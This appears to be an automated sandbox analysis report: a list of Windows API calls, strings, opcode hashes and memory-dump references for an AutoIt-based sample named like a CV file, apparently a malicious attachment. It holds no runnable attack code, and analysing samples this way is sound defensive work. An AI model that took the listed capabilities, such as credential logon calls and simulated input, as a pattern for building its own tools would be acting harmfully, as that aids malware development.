                                                                                            • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 001074DE
                                                                                            Similarity
                                                                                            • API ID: mouse_event
                                                                                            APIs
                                                                                            • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,000FAD3E), ref: 000FB124
                                                                                            Similarity
                                                                                            • API ID: LogonUser
                                                                                            Similarity
                                                                                            • API ID: NameUser
                                                                                            APIs
                                                                                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 000E818F
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                            • String ID:
                                                                                            • API String ID: 3192549508-0
                                                                                            • Opcode ID: 9f7fad9f5eff53ff13a82057dba35ec26f5762f0703a6f4b377f8237642a9b86
                                                                                            • Instruction ID: 99ee08dbda1f2f1e9ba8427e6944e2f430245359170a380d3410c942f7e80782
                                                                                            • Opcode Fuzzy Hash: 9f7fad9f5eff53ff13a82057dba35ec26f5762f0703a6f4b377f8237642a9b86
                                                                                            • Instruction Fuzzy Hash: 3FA0223000020CFBCF002F82FC0A8883FACFB022A0B000020F80C00830CB33A8A08AE2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 46d0c26a90ed1cd8e4745fc0f1a0037bd4874a4ff59d11b5a0e3ce3bbc0f5368
                                                                                            • Instruction ID: c14875e7424cbee20625bfa15521521d53e791e0361d0e84f170e8df710a807f
                                                                                            • Opcode Fuzzy Hash: 46d0c26a90ed1cd8e4745fc0f1a0037bd4874a4ff59d11b5a0e3ce3bbc0f5368
                                                                                            • Instruction Fuzzy Hash: A5227CB0A042468FDB24DF58C490BBEB7F0FF14314F14816EE94A9B392E735A985CB91
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throwstd::exception::exception
                                                                                            • String ID:
                                                                                            • API String ID: 3728558374-0
                                                                                            APIs
                                                                                            • DeleteObject.GDI32(00000000), ref: 0011A2FE
                                                                                            • DeleteObject.GDI32(00000000), ref: 0011A310
                                                                                            • DestroyWindow.USER32 ref: 0011A31E
                                                                                            • GetDesktopWindow.USER32 ref: 0011A338
                                                                                            • GetWindowRect.USER32(00000000), ref: 0011A33F
                                                                                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0011A480
                                                                                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0011A490
                                                                                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A4D8
                                                                                            • GetClientRect.USER32(00000000,?), ref: 0011A4E4
                                                                                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0011A51E
                                                                                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A540
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A553
                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A55E
                                                                                            • GlobalLock.KERNEL32(00000000), ref: 0011A567
                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A576
                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0011A57F
                                                                                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A586
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0011A591
                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A5A3
                                                                                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0014D9BC,00000000), ref: 0011A5B9
                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0011A5C9
                                                                                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0011A5EF
                                                                                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0011A60E
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A630
                                                                                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0011A81D
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                            • String ID: $AutoIt v3$DISPLAY$static
                                                                                            • API String ID: 2211948467-2373415609
                                                                                            APIs
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0012D2DB
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0012D30C
                                                                                            • GetSysColor.USER32(0000000F), ref: 0012D318
                                                                                            • SetBkColor.GDI32(?,000000FF), ref: 0012D332
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0012D341
                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0012D36C
                                                                                            • GetSysColor.USER32(00000010), ref: 0012D374
                                                                                            • CreateSolidBrush.GDI32(00000000), ref: 0012D37B
                                                                                            • FrameRect.USER32(?,?,00000000), ref: 0012D38A
                                                                                            • DeleteObject.GDI32(00000000), ref: 0012D391
                                                                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0012D3DC
                                                                                            • FillRect.USER32(?,?,00000000), ref: 0012D40E
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0012D439
                                                                                              • Part of subcall function 0012D575: GetSysColor.USER32(00000012), ref: 0012D5AE
                                                                                              • Part of subcall function 0012D575: SetTextColor.GDI32(?,?), ref: 0012D5B2
                                                                                              • Part of subcall function 0012D575: GetSysColorBrush.USER32(0000000F), ref: 0012D5C8
                                                                                              • Part of subcall function 0012D575: GetSysColor.USER32(0000000F), ref: 0012D5D3
                                                                                              • Part of subcall function 0012D575: GetSysColor.USER32(00000011), ref: 0012D5F0
                                                                                              • Part of subcall function 0012D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0012D5FE
                                                                                              • Part of subcall function 0012D575: SelectObject.GDI32(?,00000000), ref: 0012D60F
                                                                                              • Part of subcall function 0012D575: SetBkColor.GDI32(?,00000000), ref: 0012D618
                                                                                              • Part of subcall function 0012D575: SelectObject.GDI32(?,?), ref: 0012D625
                                                                                              • Part of subcall function 0012D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0012D644
                                                                                              • Part of subcall function 0012D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0012D65B
                                                                                              • Part of subcall function 0012D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0012D670
                                                                                              • Part of subcall function 0012D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0012D698
                                                                                            Similarity
                                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                            • String ID:
                                                                                            • API String ID: 3521893082-0
                                                                                            APIs
                                                                                            • DestroyWindow.USER32 ref: 000DB98B
                                                                                            • DeleteObject.GDI32(00000000), ref: 000DB9CD
                                                                                            • DeleteObject.GDI32(00000000), ref: 000DB9D8
                                                                                            • DestroyIcon.USER32(00000000), ref: 000DB9E3
                                                                                            • DestroyWindow.USER32(00000000), ref: 000DB9EE
                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0013D2AA
                                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0013D2E3
                                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0013D711
                                                                                              • Part of subcall function 000DB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000DB759,?,00000000,?,?,?,?,000DB72B,00000000,?), ref: 000DBA58
                                                                                            • SendMessageW.USER32 ref: 0013D758
                                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0013D76F
                                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0013D785
                                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0013D790
                                                                                            Strings
                                                                                            Similarity
                                                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                            • String ID: 0
                                                                                            • API String ID: 464785882-4108050209
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0010DBD6
                                                                                            • GetDriveTypeW.KERNEL32(?,0015DC54,?,\\.\,0015DC00), ref: 0010DCC3
                                                                                            • SetErrorMode.KERNEL32(00000000,0015DC54,?,\\.\,0015DC00), ref: 0010DE29
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorMode$DriveType
                                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                            • API String ID: 2907320926-4222207086
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __wcsnicmp
                                                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                            • API String ID: 1038674560-86951937
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0012C788
                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0012C83E
                                                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 0012C859
                                                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0012CB15
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Window
                                                                                            • String ID: 0
                                                                                            • API String ID: 2326795674-4108050209
                                                                                            APIs
                                                                                            • CharUpperBuffW.USER32(?,?,0015DC00), ref: 00126449
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharUpper
                                                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                            • API String ID: 3964851224-45149045
                                                                                            APIs
                                                                                            • GetSysColor.USER32(00000012), ref: 0012D5AE
                                                                                            • SetTextColor.GDI32(?,?), ref: 0012D5B2
                                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0012D5C8
                                                                                            • GetSysColor.USER32(0000000F), ref: 0012D5D3
                                                                                            • CreateSolidBrush.GDI32(?), ref: 0012D5D8
                                                                                            • GetSysColor.USER32(00000011), ref: 0012D5F0
                                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0012D5FE
                                                                                            • SelectObject.GDI32(?,00000000), ref: 0012D60F
                                                                                            • SetBkColor.GDI32(?,00000000), ref: 0012D618
                                                                                            • SelectObject.GDI32(?,?), ref: 0012D625
                                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0012D644
                                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0012D65B
                                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0012D670
                                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0012D698
                                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0012D6BF
                                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0012D6DD
                                                                                            • DrawFocusRect.USER32(?,?), ref: 0012D6E8
                                                                                            • GetSysColor.USER32(00000011), ref: 0012D6F6
                                                                                            • SetTextColor.GDI32(?,00000000), ref: 0012D6FE
                                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0012D712
                                                                                            • SelectObject.GDI32(?,0012D2A5), ref: 0012D729
                                                                                            • DeleteObject.GDI32(?), ref: 0012D734
                                                                                            • SelectObject.GDI32(?,?), ref: 0012D73A
                                                                                            • DeleteObject.GDI32(?), ref: 0012D73F
                                                                                            • SetTextColor.GDI32(?,?), ref: 0012D745
                                                                                            • SetBkColor.GDI32(?,?), ref: 0012D74F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                            • String ID:
                                                                                            • API String ID: 1996641542-0
                                                                                            APIs
                                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0012B7B0
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0012B7C1
                                                                                            • CharNextW.USER32(0000014E), ref: 0012B7F0
                                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0012B831
                                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0012B847
                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0012B858
                                                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0012B875
                                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 0012B8C7
                                                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0012B8DD
                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0012B90E
                                                                                            • _memset.LIBCMT ref: 0012B933
                                                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0012B97C
                                                                                            • _memset.LIBCMT ref: 0012B9DB
                                                                                            • SendMessageW.USER32 ref: 0012BA05
                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 0012BA5D
                                                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 0012BB0A
                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0012BB2C
                                                                                            • GetMenuItemInfoW.USER32(?), ref: 0012BB76
                                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0012BBA3
                                                                                            • DrawMenuBar.USER32(?), ref: 0012BBB2
                                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 0012BBDA
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                            • String ID: 0
                                                                                            • API String ID: 1073566785-4108050209
                                                                                            APIs
                                                                                            • GetCursorPos.USER32(?), ref: 0012778A
                                                                                            • GetDesktopWindow.USER32 ref: 0012779F
                                                                                            • GetWindowRect.USER32(00000000), ref: 001277A6
                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00127808
                                                                                            • DestroyWindow.USER32(?), ref: 00127834
                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0012785D
                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0012787B
                                                                                            • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 001278A1
                                                                                            • SendMessageW.USER32(?,00000421,?,?), ref: 001278B6
                                                                                            • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 001278C9
                                                                                            • IsWindowVisible.USER32(?), ref: 001278E9
                                                                                            • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00127904
                                                                                            • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00127918
                                                                                            • GetWindowRect.USER32(?,?), ref: 00127930
                                                                                            • MonitorFromPoint.USER32(?,?,00000002), ref: 00127956
                                                                                            • GetMonitorInfoW.USER32 ref: 00127970
                                                                                            • CopyRect.USER32(?,?), ref: 00127987
                                                                                            • SendMessageW.USER32(?,00000412,00000000), ref: 001279F2
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                            • String ID: ($0$tooltips_class32
                                                                                            • API String ID: 698492251-4156429822
                                                                                            APIs
                                                                                            • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00106CFB
                                                                                            • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00106D21
                                                                                            • _wcscpy.LIBCMT ref: 00106D4F
                                                                                            • _wcscmp.LIBCMT ref: 00106D5A
                                                                                            • _wcscat.LIBCMT ref: 00106D70
                                                                                            • _wcsstr.LIBCMT ref: 00106D7B
                                                                                            • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00106D97
                                                                                            • _wcscat.LIBCMT ref: 00106DE0
                                                                                            • _wcscat.LIBCMT ref: 00106DE7
                                                                                            • _wcsncpy.LIBCMT ref: 00106E12
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                            • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                            • API String ID: 699586101-1459072770
                                                                                            • Opcode ID: a7e8b522922328d5904e79541a63af8f3557b6d1c1a6b49cd0e32a1e9c97e5da
                                                                                            • Instruction ID: cea16a4d5d630b93cc11a385aff1c9e29f587b1c9a6b2001b5cf922c47847439
                                                                                            • Opcode Fuzzy Hash: a7e8b522922328d5904e79541a63af8f3557b6d1c1a6b49cd0e32a1e9c97e5da
                                                                                            • Instruction Fuzzy Hash: CF41F272A00241BFEB10AB65DC47EFF77BCEF41310F14406AF945A6283EBB49A1097A1
                                                                                            APIs
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000DA939
                                                                                            • GetSystemMetrics.USER32(00000007), ref: 000DA941
                                                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000DA96C
                                                                                            • GetSystemMetrics.USER32(00000008), ref: 000DA974
                                                                                            • GetSystemMetrics.USER32(00000004), ref: 000DA999
                                                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000DA9B6
                                                                                            • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 000DA9C6
                                                                                            • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000DA9F9
                                                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000DAA0D
                                                                                            • GetClientRect.USER32(00000000,000000FF), ref: 000DAA2B
                                                                                            • GetStockObject.GDI32(00000011), ref: 000DAA47
                                                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 000DAA52
                                                                                              • Part of subcall function 000DB63C: GetCursorPos.USER32(000000FF), ref: 000DB64F
                                                                                              • Part of subcall function 000DB63C: ScreenToClient.USER32(00000000,000000FF), ref: 000DB66C
                                                                                              • Part of subcall function 000DB63C: GetAsyncKeyState.USER32(00000001), ref: 000DB691
                                                                                              • Part of subcall function 000DB63C: GetAsyncKeyState.USER32(00000002), ref: 000DB69F
                                                                                            • SetTimer.USER32(00000000,00000000,00000028,000DAB87), ref: 000DAA79
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                            • String ID: AutoIt v3 GUI
                                                                                            • API String ID: 1458621304-248962490
                                                                                            • Opcode ID: c9de7c68086bf03b6311ff9905d5fbf726a65a226f22beae21331ceb3d38dab8
                                                                                            • Instruction ID: f4cd269d7315c2f88490f2bab37530f1aafc8f18491869e70f2748e6bbe7bc08
                                                                                            • Opcode Fuzzy Hash: c9de7c68086bf03b6311ff9905d5fbf726a65a226f22beae21331ceb3d38dab8
                                                                                            • Instruction Fuzzy Hash: F6B1907560020AAFDF14DFA8ED45BED7BB4FB09314F11421AFA05A72A0DB74D981CB61
                                                                                            APIs
